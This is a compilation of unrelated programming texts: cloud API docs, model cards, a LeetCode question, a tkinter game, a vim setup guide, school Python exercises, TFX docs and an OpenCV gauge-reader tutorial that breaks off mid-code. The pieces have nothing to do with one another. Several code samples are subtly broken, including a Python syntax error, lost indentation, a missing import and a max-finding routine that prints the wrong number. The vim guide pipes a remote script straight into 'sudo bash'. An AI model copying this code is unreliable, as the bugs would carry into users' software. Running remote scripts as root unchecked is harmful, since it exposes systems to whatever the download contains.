GetObjectACL obtains the ACL for the current version of the target object by default. If the current version of the object is a delete marker, the 404 Not Found error is returned. You can specify the versionId in the request to obtain the ACL for a specified version of the target object.
# -*- coding: utf-8 -*-
import oss2
# It is highly risky to log on with the AccessKey of an Alibaba Cloud account because the account has permissions on all the APIs in OSS. We recommend that you log on as a RAM user to access APIs or perform routine operations and maintenance. To create a RAM user account, log on to https://ram.console.aliyun.com.
auth = oss2.Auth('<yourAccessKeyId>', '<yourAccessKeySecret>')
# This example uses the China East 1 (Hangzhou) endpoint. Specify the actual endpoint based on your requirements.
bucket = oss2.Bucket(auth, 'http://oss-cn-hangzhou.aliyuncs.com', '<yourBucketName>')
# Obtains the ACL for a specified version of the object.
params = dict()
params['versionId'] = '<yourObjectVersionId>'
result = bucket.get_object_acl(<'yourObjectName'>, params = params)
# Views the obtained ACL for the specified version of the object.
print('get object acl :', result.acl)
# Views the version ID of the object for which the ACL is obtained.
print('object version id:', result.versionid)
For more information about obtaining the ACL for an object, see GetObjectACL.
|
Como un nuevo programador de Python, tengo la siguiente pregunta y su correspondiente solución para Número de la isla Leetcode Pregunta:
Dado un mapa de la red de 2d '1 de (tierra) y' de 0 (agua), cuente el número de islas. Una isla está rodeada de agua y se forma mediante la conexión de las tierras adyacentes horizontal o verticalmente. Usted puede asumir los cuatro bordes de la parrilla están rodeadas por el agua.
Ejemplo:
Entrada:
11110
11010
11000
00000
Salida: 1
Solución:
class Solution:
def numIslands(self, grid: List[List[str]]) -> int:
rmax = len(grid)
if rmax == 0:
return 0
cmax = len(grid[0])
island = 0
def DFS(grid,r,c,rmax,cmax):
grid[r][c]='0'
if r+1<rmax and grid[r+1][c]=='1':
DFS(grid,r+1,c,rmax,cmax)
if r-1>=0 and grid[r-1][c]=='1':
DFS(grid,r-1,c,rmax,cmax)
if c+1<cmax and grid[r][c+1]=='1':
DFS(grid,r,c+1,rmax,cmax)
if c-1>=0 and grid[r][c-1]=='1':
DFS(grid,r,c-1,rmax,cmax)
for r in range(rmax):
for c in range(cmax):
if grid[r][c]=='1':
DFS(grid,r,c,rmax,cmax)
island+=1
return island
¿Puede cualquier experto que me haga saber lo que es el caso base en la función DFS?
|
bert-base-hi-cased
We are sharing smaller versions of bert-base-multilingual-cased that handle a custom number of languages.
Unlike distilbert-base-multilingual-cased, our versions give exactly the same representations produced by the original model which preserves the original accuracy.
For more information please visit our paper: Load What You Need: Smaller Versions of Multilingual BERT.
How to use
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("Geotrend/bert-base-hi-cased")
model = AutoModel.from_pretrained("Geotrend/bert-base-hi-cased")
To generate other smaller versions of multilingual transformers please visit our Github repo.
How to cite
@inproceedings{smallermbert,
title={Load What You Need: Smaller Versions of Mutlilingual BERT},
author={Abdaoui, Amine and Pradel, Camille and Sigel, Grégoire},
booktitle={SustaiNLP / EMNLP},
year={2020}
}
Contact
Please contact amine@geotrend.fr for any question, feedback or request.
Downloads last month
0
|
Twitter-roBERTa-base for Offensive Language Identification
This is a roBERTa-base model trained on ~58M tweets and finetuned for offensive language identification with the TweetEval benchmark.
Example of classification
from transformers import AutoModelForSequenceClassification
from transformers import TFAutoModelForSequenceClassification
from transformers import AutoTokenizer
import numpy as np
from scipy.special import softmax
import csv
import urllib.request
# Preprocess text (username and link placeholders)
def preprocess(text):
new_text = []
for t in text.split(" "):
t = '@user' if t.startswith('@') and len(t) > 1 else t
t = 'http' if t.startswith('http') else t
new_text.append(t)
return " ".join(new_text)
# Tasks:
# emoji, emotion, hate, irony, offensive, sentiment
# stance/abortion, stance/atheism, stance/climate, stance/feminist, stance/hillary
task='offensive'
MODEL = f"cardiffnlp/twitter-roberta-base-{task}"
tokenizer = AutoTokenizer.from_pretrained(MODEL)
# download label mapping
labels=[]
mapping_link = f"https://raw.githubusercontent.com/cardiffnlp/tweeteval/main/datasets/{task}/mapping.txt"
with urllib.request.urlopen(mapping_link) as f:
html = f.read().decode('utf-8').split("\n")
csvreader = csv.reader(html, delimiter='\t')
labels = [row[1] for row in csvreader if len(row) > 1]
# PT
model = AutoModelForSequenceClassification.from_pretrained(MODEL)
model.save_pretrained(MODEL)
text = "Good night 😊"
text = preprocess(text)
encoded_input = tokenizer(text, return_tensors='pt')
output = model(**encoded_input)
scores = output[0][0].detach().numpy()
scores = softmax(scores)
# # TF
# model = TFAutoModelForSequenceClassification.from_pretrained(MODEL)
# model.save_pretrained(MODEL)
# text = "Good night 😊"
# encoded_input = tokenizer(text, return_tensors='tf')
# output = model(encoded_input)
# scores = output[0][0].numpy()
# scores = softmax(scores)
ranking = np.argsort(scores)
ranking = ranking[::-1]
for i in range(scores.shape[0]):
l = labels[ranking[i]]
s = scores[ranking[i]]
print(f"{i+1}) {l} {np.round(float(s), 4)}")
Output:
1) not-offensive 0.9073
2) offensive 0.0927
Downloads last month
0
|
Face API - v1.0
This API is currently available in:
Australia East - australiaeast.api.cognitive.microsoft.com
Brazil South - brazilsouth.api.cognitive.microsoft.com
Canada Central - canadacentral.api.cognitive.microsoft.com
Central India - centralindia.api.cognitive.microsoft.com
Central US - centralus.api.cognitive.microsoft.com
East Asia - eastasia.api.cognitive.microsoft.com
East US - eastus.api.cognitive.microsoft.com
East US 2 - eastus2.api.cognitive.microsoft.com
France Central - francecentral.api.cognitive.microsoft.com
Japan East - japaneast.api.cognitive.microsoft.com
Japan West - japanwest.api.cognitive.microsoft.com
Korea Central - koreacentral.api.cognitive.microsoft.com
North Central US - northcentralus.api.cognitive.microsoft.com
North Europe - northeurope.api.cognitive.microsoft.com
South Africa North - southafricanorth.api.cognitive.microsoft.com
South Central US - southcentralus.api.cognitive.microsoft.com
Southeast Asia - southeastasia.api.cognitive.microsoft.com
UK South - uksouth.api.cognitive.microsoft.com
West Central US - westcentralus.api.cognitive.microsoft.com
West Europe - westeurope.api.cognitive.microsoft.com
West US - westus.api.cognitive.microsoft.com
West US 2 - westus2.api.cognitive.microsoft.com
UAE North - uaenorth.api.cognitive.microsoft.com
FaceList - List
List face lists’ faceListId, name, userData and recognitionModel.
To get face information inside faceList useFaceList - Get.
Http Method
GET
Select the testing console in the region where you created your resource:
West US West US 2 East US East US 2 West Central US South Central US West Europe North Europe Southeast Asia East Asia Australia East Brazil South Canada Central Central India UK South Japan East Central US France Central Korea Central Japan West North Central US South Africa North UAE North
Request URL
Request parameters
Return 'recognitionModel' or not. The default value is false.
Request headers
Request body
Response 200
A successful call returns an array of faceList.
JSON fields in response body:
Fields Type Description
faceListId String Face list ID
name String Face list name which user assigned
userData String User-provided data attached to the face list
recognitionModel String The 'recognitionModel' associated with this face list. This is only returned when 'returnRecognitionModel' is explicitly set as true.
[
{
"faceListId": "sample_list",
"name": "list1",
"userData": "User-provided data attached to the face list.",
"recognitionModel": "recognition_03"
},
…
]
Response 401
Error code and message returned in JSON:
Error Code Error Message Description
Unspecified Invalid subscription Key or user/plan is blocked.
{
"error": {
"code": "Unspecified",
"message": "Access denied due to invalid subscription key. Make sure you are subscribed to an API you are trying to call and provide the right key."
}
}
Response 403
{
"error": {
"statusCode": 403,
"message": "Out of call volume quota. Quota will be replenished in 2 days."
}
}
Response 429
{
"error": {
"statusCode": 429,
"message": "Rate limit is exceeded. Try again in 26 seconds."
}
}
Code samples
@ECHO OFF
curl -v -X GET "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists?returnRecognitionModel=false"
-H "Ocp-Apim-Subscription-Key: {subscription key}"
--data-ascii "{body}"
using System;
using System.Net.Http.Headers;
using System.Text;
using System.Net.Http;
using System.Web;
namespace CSHttpClientSample
{
static class Program
{
static void Main()
{
MakeRequest();
Console.WriteLine("Hit ENTER to exit...");
Console.ReadLine();
}
static async void MakeRequest()
{
var client = new HttpClient();
var queryString = HttpUtility.ParseQueryString(string.Empty);
// Request headers
client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request parameters
queryString["returnRecognitionModel"] = "false";
var uri = "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists?" + queryString;
var response = await client.GetAsync(uri);
}
}
}
// // This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
import java.net.URI;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.utils.URIBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
public class JavaSample
{
public static void main(String[] args)
{
HttpClient httpclient = HttpClients.createDefault();
try
{
URIBuilder builder = new URIBuilder("https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists");
builder.setParameter("returnRecognitionModel", "false");
URI uri = builder.build();
HttpGet request = new HttpGet(uri);
request.setHeader("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request body
StringEntity reqEntity = new StringEntity("{body}");
request.setEntity(reqEntity);
HttpResponse response = httpclient.execute(request);
HttpEntity entity = response.getEntity();
if (entity != null)
{
System.out.println(EntityUtils.toString(entity));
}
}
catch (Exception e)
{
System.out.println(e.getMessage());
}
}
}
<!DOCTYPE html>
<html>
<head>
<title>JSSample</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$(function() {
var params = {
// Request parameters
"returnRecognitionModel": "false",
};
$.ajax({
url: "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists?" + $.param(params),
beforeSend: function(xhrObj){
// Request headers
xhrObj.setRequestHeader("Ocp-Apim-Subscription-Key","{subscription key}");
},
type: "GET",
// Request body
data: "{body}",
})
.done(function(data) {
alert("success");
})
.fail(function() {
alert("error");
});
});
</script>
</body>
</html>
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[])
{
NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
NSString* path = @"https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists";
NSArray* array = @[
// Request parameters
@"entities=true",
@"returnRecognitionModel=false",
];
NSString* string = [array componentsJoinedByString:@"&"];
path = [path stringByAppendingFormat:@"?%@", string];
NSLog(@"%@", path);
NSMutableURLRequest* _request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:path]];
[_request setHTTPMethod:@"GET"];
// Request headers
[_request setValue:@"{subscription key}" forHTTPHeaderField:@"Ocp-Apim-Subscription-Key"];
// Request body
[_request setHTTPBody:[@"{body}" dataUsingEncoding:NSUTF8StringEncoding]];
NSURLResponse *response = nil;
NSError *error = nil;
NSData* _connectionData = [NSURLConnection sendSynchronousRequest:_request returningResponse:&response error:&error];
if (nil != error)
{
NSLog(@"Error: %@", error);
}
else
{
NSError* error = nil;
NSMutableDictionary* json = nil;
NSString* dataString = [[NSString alloc] initWithData:_connectionData encoding:NSUTF8StringEncoding];
NSLog(@"%@", dataString);
if (nil != _connectionData)
{
json = [NSJSONSerialization JSONObjectWithData:_connectionData options:NSJSONReadingMutableContainers error:&error];
}
if (error || !json)
{
NSLog(@"Could not parse loaded json with error:%@", error);
}
NSLog(@"%@", json);
_connectionData = nil;
}
[pool drain];
return 0;
}
<?php
// This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
require_once 'HTTP/Request2.php';
$request = new Http_Request2('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists');
$url = $request->getUrl();
$headers = array(
// Request headers
'Ocp-Apim-Subscription-Key' => '{subscription key}',
);
$request->setHeader($headers);
$parameters = array(
// Request parameters
'returnRecognitionModel' => 'false',
);
$url->setQueryVariables($parameters);
$request->setMethod(HTTP_Request2::METHOD_GET);
// Request body
$request->setBody("{body}");
try
{
$response = $request->send();
echo $response->getBody();
}
catch (HttpException $ex)
{
echo $ex;
}
?>
########### Python 2.7 #############
import httplib, urllib, base64
headers = {
# Request headers
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.urlencode({
# Request parameters
'returnRecognitionModel': 'false',
})
try:
conn = httplib.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
conn.request("GET", "/face/v1.0/facelists?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
########### Python 3.2 #############
import http.client, urllib.request, urllib.parse, urllib.error, base64
headers = {
# Request headers
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.parse.urlencode({
# Request parameters
'returnRecognitionModel': 'false',
})
try:
conn = http.client.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
conn.request("GET", "/face/v1.0/facelists?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
require 'net/http'
uri = URI('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists')
uri.query = URI.encode_www_form({
# Request parameters
'returnRecognitionModel' => 'false'
})
request = Net::HTTP::Get.new(uri.request_uri)
# Request headers
request['Ocp-Apim-Subscription-Key'] = '{subscription key}'
# Request body
request.body = "{body}"
response = Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request(request)
end
puts response.body
|
Mi primera aplicacion grafica con python y la libreria tkinter
#!/usr/bin/python3.2
import tkinter
from tkinter import *
import random
window = tkinter.Tk()
window.geometry("410x70")
window.title("Adivina el numero")
window.configure(bg = "gray")
Texto = tkinter.Label(window, text = "Adivina el numero", font = "Monospace, 15", bg="gray")
Texto.pack(fill = "both")
Texto.grid(row = 1, column = 1)
NumberImput = tkinter.Entry(window, width="15", fg="blue")
NumberImput.grid(row = 1, column = 2)
NumeroBot = random.randint(1, 9999)
NumeroBot = NumeroBot
NumeroPersona = NumberImput.get()
Indicador = ""
def Form():
global NumberImput
global window
global Indicador
global NumeroBot
# NumeroOfPersona = int(NumberImput.get())
print(NumeroPersona)
NumeroOfPersona = int(NumberImput.get())
if NumeroOfPersona == NumeroBot:
print("Lo lograste")
Indicador = "Lo Lograste"
window2 = tkinter.Tk()
GanasteTexto = tkinter.Label(window2,text = "Ganaste, Felicidades", font = "Monospace, 50", bg = "orange", fg="blue")
GanasteTexto.grid()
window2.title('Ganaste!')
window2.mainloop()
if NumeroOfPersona > NumeroBot:
print("Un numero mas bajo porfavor")
Indicador = "Un Numero Mas Bajo Porfavor"
if NumeroOfPersona < NumeroBot:
print("Un Numero Mas alto porfavor")
Indicador = "Un Numero mas alto Porfavor"
Pistero = tkinter.Label(window,text= Indicador, bg="#fff")
Pistero.grid(row = 2, column = 1)
#Texto.pack()
botonGet = tkinter.Button(text = "Aplastame",bg = "orange", command = Form, fg="yellow")
botonGet.pack(fill = "both")
botonGet.grid(row = 1, column = 3)
window.mainloop()
`
|
This is an extension to my first vim-ide post. But this part focuses on setup for intellisense features that increase coding performance, like scanning for errors, autocompletion, refractoring and more.
install languages to the system
Install the languages/tools your vim will need to support. If your language is constantly updated, your distribution may not have the latest package, for example ubuntu generally has verions of nodejs and npm that aren’t compatible with each other.
javascipt
curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
sudo apt-get install -y nodejs
python interpreter, pip3 package manager
sudo apt install -y python3 pip3
texlive cross platofrm latex system, latexmk compiler
sudo apt install texlive-latex-extra
sudo apt install latexmk
plugins
linters and fixers
Linters are programs that scan a file for errors and style problems in your code, they then present these errors to you.
Fixers detect style problems and maybe some errors, and then they automatically fix them after a certain condition, for example every time you save the file.
Using multiple linter/fixer plugins and configuring them can be difficult, so its better to use a large all in one solution. Ale is a plugin that lints asyncronously, so it will run scans every time you change vim mode.
Linter and fixer programs generally apply to one language, so we will need at least one per language.
install
install the linters and fixers
javascipt
Eslint can serve as a linter and a fixer.
sudo npm install eslint -g
python
Pyflakes just lints for errors, and the python software foundations black autoformats code to confirm to official style rules.pip3 install pyflakes pip3 install black
latex
Depending for what tex package you downloaded, some linters may aready be installed.
sudo apt install chktex
sudo apt install lacheck
if you cant find a linter or fixer, you can check ales linter scripts, all supported linters with be there https://github.com/dense-analysis/ale/tree/master/ale_linters
config vim
then tell ale to use them in vimrc
let g:ale_linters = { \'javascript': ['eslint'], \'python': ['pyflakes'], \'tex': ['chktex', 'lacheck'] \} let g:ale_fixers = { \'*': ['remove_trailing_lines'], \'javascript': ['eslint'], \'python': ['black'] \}
language servers (LSPs)
Microsofts language server protocol uses a server to provide intellisense to the editor (client), since the functionality instant build stright into the editor, it can easyily be implemented across many editors. The main lsp functionality is autocomplete, but most provide many more features: go to definition, refractor, lint, …
coc.nvim
Vim needs a plugin to act as a client for the language server. Coc.nvim is one that gets activate development, and has many language servers from vs-code extensions.
LSPs
Coc.nvim has lsps to support most languages and most LSPs can be installed without any configuration as an extension via
:CocInstall coc-lspname
javascript (and typescript)
https://github.com/neoclide/coc-tsserver
:CocInstall coc-tsserver
python
https://github.com/neoclide/coc-python
:CocInstall coc-python
https://github.com/fannheyward/coc-pyright
:CocInstall coc-pyright
others
If you cant find a working/compatible linter/fixer/lsp for a language or need more functionality, then you get an individual plugin for that language.
For example vimtex for latex.
https://github.com/lervag/vimtex
Features
live preview latex documents from a variety of pdf viewers
key bindings to naviage documents quicker
better syntax highlighting
May also need additional packages, vimtex requires latexmk to compile docs.
|
In this article, you will get 10 best Programs for Computer practical file Class 12. This programs can be useful for your practical file for the board examination.
Here we provide the code of assignment questions shared earlier.
10 best Programs for Computer practical file Class 12
Let’s start the article Computer practical file Class 12 with basic function programs.
1. Write a python program to perform the basic arithmetic operations in a menu-driven program with different functions. The output should be like this:
Select an operator to perform the task:
‘+’ for Addition
‘-‘ for Subtraction
‘*’ for Multiplication
‘/’ for Division
def main():
print('+ for Addition')
print('- for Subtraction')
print('* for Multiplication')
print('/ for Division')
ch = input("Enter your choice:")
if ch=='+':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Addition:",add(x,y))
elif ch=='-':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Subtraction:",sub(x,y))
elif ch=='*':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Multiplication",mul(x,y))
elif ch=='/':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Division",div(x,y))
else:
print("Invalid character")
def add(a,b):
return a+b
def sub(a,b):
return a-b
def mul(a,b):
return a*b
def div(a,b):
return a/b
main()
2. Write a python program to enter a temperature in Celsius into Fahrenheit by using function.
def tempConvert():
cels = float(input("Enter temperature in celsius: "))
fh = (cels * 9/5) + 32
print('%.2f Celsius is: %0.2f Fahrenheit' %(cels, fh))
tempConvert()
3. Write a python program using a function to print Fibonacci series up to n numbers.
def fibo():
n=int(input("Enter the number:"))
a=0
b=1
temp=0
for i in range(0,n):
temp = a + b
b = a
a= temp
print(a, end=" ")
fibo()
4. Write a python program to return factorial series up to n numbers using a function.
def facto():
n=int(input("Enter the number:"))
f=1
for i in range(1,n+1):
f*=i
print(f, end=" ")
facto()
Now the next programs for Computer practical file Class 12 are based on parameters passing.
5. Write a python program to accept username “Admin” as default argument and password 123 entered by user to allow login into the system.
def user_pass(password,username="Admin"):
if password=='123':
print("You have logged into system")
else:
print("Password is incorrect!!!!!!")
password=input("Enter the password:")
user_pass(password)
6. Write menu-driven python program using different functions for the following menu:
Check no. is Palindrome or not
Check no. is Armstrong or not
Exit
def checkPalin(n):
temp=n
rem=0
rev=0
while(n>0):
rem=n%10
rev=rev*10+rem
n=n//10
if(temp==rev):
print("The number is a palindrome!")
else:
print("The number is not a palindrome!")
def checkArmstrong(n):
temp=n
rem=0
arm=0
while(n>0):
rem=n%10
arm+=rem**3
n=n//10
if(temp==arm):
print("The number is an armstrong!")
else:
print("The number is not an armstrong!")
def menu():
print("1.Check no. is Palindrome:")
print("2.Check no. is Armstrong:")
print("3.Exit")
opt=int(input("Enter option:"))
no=int(input("Enter number to check:"))
if opt==1:
checkPalin(no)
elif opt==2:
checkArmstrong(no)
elif opt==3:
sys.exit()
else:
print("Invalid option")
menu()
7. Write a python program using a function to print prime numbers between 11 to 200.
start =11
end =200
print("Prime numbers between", start, "and", end, "are:")
for n in range(start, end + 1):
if n > 1:
for i in range(2, n):
if (n % i) == 0:
break
else:
print(n,",",end=" ")
The next program for Computer practical file Class 12 is based on variable length argument.
8. Write a python program to demonstrate the concept of variable length argument to calculate sum and product of the first 10 numbers.
def sum10(*n):
total=0
for i in n:
total=total + i
print("Sum of first 10 Numbers:",total)
sum10(1,2,3,4,5,6,7,8,9,10)
def product10(*n):
pr=1
for i in n:
pr=pr * i
print("Product of first 10 Numbers:",pr)
product10(1,2,3,4,5,6,7,8,9,10)
The next program for Computer practical file Class 12 id based on different logics.
9. Write a python program to find maximum and minimum numbers among given 4 numbers.Method 1: Using If..elif..else
def find_max():
n1=int(input("Enter number1:"))
n2=int(input("Enter number2:"))
n3=int(input("Enter number3:"))
n4=int(input("Enter number4:"))
if n1>n2 and n1>n3 and n1>n4:
print(n1," is maximum")
elif n2>n1 and n2>n3 and n2>n4:
print(n2," is maximum")
elif n3>n1 and n3>n2 and n3>n4:
print(n3," is maximum")
elif n4>n1 and n4>n2 and n4>n3:
print(n2," is maximum")
else:
print("All are equals")
Method 2: Using list
def find_max():
l=[]
max1=0
for i in range(4):
n=int(input("Enter number into list:"))
l.append(n)
print("The list is:",l)
for i in l:
if i>max1:
max1=i
print("Max:",max1)
Method 3: Using max function
def find_max():
l=[]
max1=0
for i in range(4):
n=int(input("Enter number into list:"))
l.append(n)
max1=max(l)
print("Max:",max1)
Method 4: Using sort() function
def find_max():
l=[]
max1=0
for i in range(4):
n=int(input("Enter number into list:"))
l.append(n)
l.sort()
print("Max:",l[-1])
The last program for Computer practical file Class 12 is based on diagram patterns.
10. Write a python program to print the following patterns using functions:
Diamond Pattern with *
Butterfly Pattern with *
Triangle Pattern with *
def pattern_diamond(n):
no = 0
for i in range(1, n + 1):
for j in range (1, (n - i) + 1):
print(end = " ")
while no != (2 * i - 1):
print("*", end = "")
no = no + 1
no = 0
print()
k = 1
no = 1
for i in range(1, n):
for j in range (1, k + 1):
print(end = " ")
k = k + 1
while no <= (2 * (n - i) - 1):
print("*", end = "")
no = no + 1
no = 1
print()
num=int(input("Enter no or lines to print:"))
pattern_diamond(num)
def pattern_butterfly(n):
for i in range(1, n + 1):
for j in range(1, 2 * n + 1):
if (i < j):
print("", end = " ");
else:
print("*", end = "");
if (i <= ((2 * n) - j)):
print("", end = " ");
else:
print("*", end = "");
print("");
for i in range(1, n + 1):
for j in range(1, 2 * n + 1):
if (i > (n - j + 1)):
print("", end = " ");
else:
print("*", end = "");
if ((i + n) > j):
print("", end = " ");
else:
print("*", end = "");
print("");
num=int(input("Enter no or lines to print:"))
pattern_butterfly(num);
def pattern_triangle(n):
for i in range(1, n+1):
for j in range(1, i+1):
print("* ",end="")
print("r")
num=int(input("Enter no or lines to print:"))
pattern_triangle(num)
Follow this link to download file:
So I hope these programs will help you to prepare your Computer practical file Class 12 . If you have any doubt for the same feel free to ask in the comment section
Don’t forget to share your views, comments and feedback in the comment section for Computer practical file Class 12 .
|
Al diseñar su código de modelado de TensorFlow para TFX, hay algunos elementos que debe tener en cuenta, incluida la elección de una API de modelado.
Consume: SavedModel de Transform y datos de ExampleGen
Emite: modelo entrenado en formato SavedModel
La capa de entrada de su modelo debe consumir desde el modelo guardado que fue creado por un componente de transformación , y las capas del modelo de transformación deben incluirse con su modelo para que cuando exporte su modelo guardado y evalSavedModel incluirán las transformaciones que fueron creadas por la transformación componente.
Un diseño de modelo típico de TensorFlow para TFX se ve así:
def _build_estimator(tf_transform_dir,
config,
hidden_units=None,
warm_start_from=None):
"""Build an estimator for predicting the tipping behavior of taxi riders.
Args:
tf_transform_dir: directory in which the tf-transform model was written
during the preprocessing step.
config: tf.contrib.learn.RunConfig defining the runtime environment for the
estimator (including model_dir).
hidden_units: [int], the layer sizes of the DNN (input layer first)
warm_start_from: Optional directory to warm start from.
Returns:
Resulting DNNLinearCombinedClassifier.
"""
metadata_dir = os.path.join(tf_transform_dir,
transform_fn_io.TRANSFORMED_METADATA_DIR)
transformed_metadata = metadata_io.read_metadata(metadata_dir)
transformed_feature_spec = transformed_metadata.schema.as_feature_spec()
transformed_feature_spec.pop(_transformed_name(_LABEL_KEY))
real_valued_columns = [
tf.feature_column.numeric_column(key, shape=())
for key in _transformed_names(_DENSE_FLOAT_FEATURE_KEYS)
]
categorical_columns = [
tf.feature_column.categorical_column_with_identity(
key, num_buckets=_VOCAB_SIZE + _OOV_SIZE, default_value=0)
for key in _transformed_names(_VOCAB_FEATURE_KEYS)
]
categorical_columns += [
tf.feature_column.categorical_column_with_identity(
key, num_buckets=_FEATURE_BUCKET_COUNT, default_value=0)
for key in _transformed_names(_BUCKET_FEATURE_KEYS)
]
categorical_columns += [
tf.feature_column.categorical_column_with_identity(
key, num_buckets=num_buckets, default_value=0)
for key, num_buckets in zip(
_transformed_names(_CATEGORICAL_FEATURE_KEYS), #
_MAX_CATEGORICAL_FEATURE_VALUES)
]
return tf.estimator.DNNLinearCombinedClassifier(
config=config,
linear_feature_columns=categorical_columns,
dnn_feature_columns=real_valued_columns,
dnn_hidden_units=hidden_units or [100, 70, 50, 25],
warm_start_from=warm_start_from)
|
last updated: 2020-12-06
Being a newbie with opencv a good starting point and help for this code was the page of Nayak Abhijeet.
Here we see the result of our program:
gauge_p2.jpg We are reading: 497.1153 µm
On Linux python3 is already installed. We need the following modules (libraries):
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import glob
import cv2 as cv # to run the code even if version changes
import numpy as np
import pandas as pd
...
os is needed for operating system dependent functionality like change directory ('os.chdir(DIRglob2 finds all the pathnames matching a specified pattern and is used to get all files from an image directory.cv2 is the opencv module to manipulate image data.numpy (NumPy) is the fundamental package for scientific computing in Python. It provides a multidimensional array object, and an assortment of routines for fast operations on arrays. Our images are such arrays.NumPy ()Pandas) provides a fast and efficient DataFrame object for data manipulation with integrated indexing. Pandas is top to work with spreadsheet data. We use pandas e.g. to create a .csv-file with the data.
On Linux use e.g sudo apt install python3-opencv to install the libraries, or use pip:
pip3 install opencv-python
pip3 install pandas
We use Python version 3. On Linux use always python3 (not python or python2) to call python, also use pip3 instead of pip.
python3 read_analogue_gauge.py
To work on the program you can use Idle, Python’s Integrated Development Environment, but we prefer the Thonny IDE.
To run the program you need to adapt the directory path for the image files:
...
DIR_NAME_IMAGES = '/mydocs/read_dial_gauge/images'
...
If you can't change to Linux and are forced to use Windows :)).
Download python on python.org and install the .exe file. On the first screen check "Add Python to PATH". This enables you to use python everywhere.
Open command prompt (Start and type cmd) and use the following commands to install the missing modules:
pip install opencv-python
pip install pandas
To work on the program you can use IDLE, Python’s Integrated Development Environment, that was already installed with the .exe-file. We prefer the Thonny IDE, that also exists for Windows.
In Windows we need to adapt the directory path. The backslash needs to get doubled, like this:
...DIR_NAME_IMAGES = 'C:\\mydocs\\read_dial_gauge\\images'...
If further help for python on Windows is needed click here: Using Python on Windows.
An overview on OpenCV methods can be found on my OpenCV basics page:
That is a good starting point to understand the following code.
#!/usr/bin/python3
# -*- coding: utf-8 -*-
""" Read pointer-type dials on an analogue gauge """
###############################################################################
#
# Name: read_analogue_gauge.py
# Purpose: read pointer-type dials on an analogue gauge
# Author: weigu.lu
# Date: 2020-12-06
# Version 1.1
#
# Copyright 2020 weigu <weigu@weigu.lu>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# source:
# https://medium.com/@nayak.abhijeet1/
# analogue-gauge-reader-using-computer-vision-62fbd6ec84cc
#
# More infos on weigu.lu/other_projects
#
###############################################################################
import os
import glob
import cv2 as cv # to run code even if version changes
import numpy as np
import pandas as pd
DIR_NAME_IMAGES = '/savit/programming/python/read_dial_gauge/images'
MAX_PIXEL = 1000 # reduce picture to this size for quicker calculations
DEBUG = 0
MIN_RADIUS_RATIO_1 = 0.8 # Where to look for the first circle
MAX_RADIUS_RATIO_1 = 0.95
MIN_RADIUS_RATIO_2 = 0.85 # Where to look for the second circle
MAX_RADIUS_RATIO_2 = 0.98
L1_P1_LOW = 0 # boundary how close the line (P1) should be from the center
L1_P1_UP = 0.3
L1_P2_LOW = 0.7 # how close P2 should be to the outside of the gauge
L1_P2_UP = 0.9
L2_P1_LOW = 0 # boundary how close the line (P1) should be from the center
L2_P1_UP = 0.3
L2_P2_LOW = 0.8 # how close P2 should be to the outside of the gauge
L2_P2_UP = 0.995
### the functions ###
def avg_circles(pcircles, pb):
'''averaging out nearby circles'''
avg_x = 0
avg_y = 0
avg_r = 0
for i in range(pb): # optional: av. multiple circles (gauge at a slight angle)
avg_x = avg_x + pcircles[0][i][0]
avg_y = avg_y + pcircles[0][i][1]
avg_r = avg_r + pcircles[0][i][2]
avg_x = int(avg_x/(pb))
avg_y = int(avg_y/(pb))
avg_r = int(avg_r/(pb))
return avg_x, avg_y, avg_r
def dist_2_pts(px1, py1, px2, py2):
'''pythagore'''
return np.sqrt((px2 - px1)**2 + (py2 - py1)**2)
def show_image(pimg, show_flag_time):
''' Show image during x ms if flag is set. Parameter show_flag_time is a
tuple e.g (1,2000) to show picture for 2s or (0,2000) to prevent the
show. (1,0) waits on keypress'''
if show_flag_time[0] == 1:
cv.imshow('image', pimg) # cv.imshow(window_name, image)
